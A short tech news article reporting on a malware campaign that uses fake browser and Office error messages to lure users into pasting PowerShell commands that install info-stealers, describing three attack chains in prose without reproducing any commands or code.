Threat actors keep switching methods to distribute malicious files and trick users into downloading malware.
One such campaign was found using fake Google Chrome, Microsoft Word, and OneDrive errors to trick users.
The campaign uses error messages that are sent to unsuspecting users through emails, as well as website overlays.
These include fake Google Chrome warnings that are displayed when a user visits a compromised website, fake website overlays and fake error reports shared via emails.
However, as before this is used to download malware onto the device compromising user security.
Threat actors keep switching methods to distribute malicious files and trick users into downloading malware. One such campaign was found using fake Google Chrome, Microsoft Word, and OneDrive errors to trick users.
The new campaign was observed being used by multiple threat actors some of which are known for operating spam distribution campaigns by sending large volumes of emails, a report from Bleeping Computer said.
The campaign uses error messages that are sent to unsuspecting users through emails, as well as website overlays. These messages are used to trick users into downloading fake browser updates. These updates are then used to install malware onto a user’s device.
Researchers observed three attack chains that are being utilized to spread malware. These include fake Google Chrome warnings that are displayed when a user visits a compromised website, fake website overlays and fake error reports shared via emails.
(For top technology news of the day, subscribe to our tech newsletter Today’s Cache)
In the first case, users are met with a warning saying there is a problem in displaying a webpage. The warning prompts the user to install a “root certificate” by copying a PowerShell script into the Windows Clipboard and running it in a Windows Admin console. This script is used to display decoy messages while it downloads and installs an info-stealer onto the device.
The second method also uses compromised websites. However, in this method, attackers were found using overlays of Google Chrome errors.
In the third method, attackers share an email resembling Microsoft Word document prompts to ask users to download what looks like “Word Online” extensions to view documents correctly. The error message also contains offers on “How to fix” and “Auto-fix” options. These contain commands that attackers say can be copied to the clipboard and pasted into PowerShell to resolve the error. However, as before this is used to download malware onto the device compromising user security.
While the campaign depends on the lack of user awareness to deliver malware, the inability of Windows to detect and block malicious actions has further exacerbated the problem.
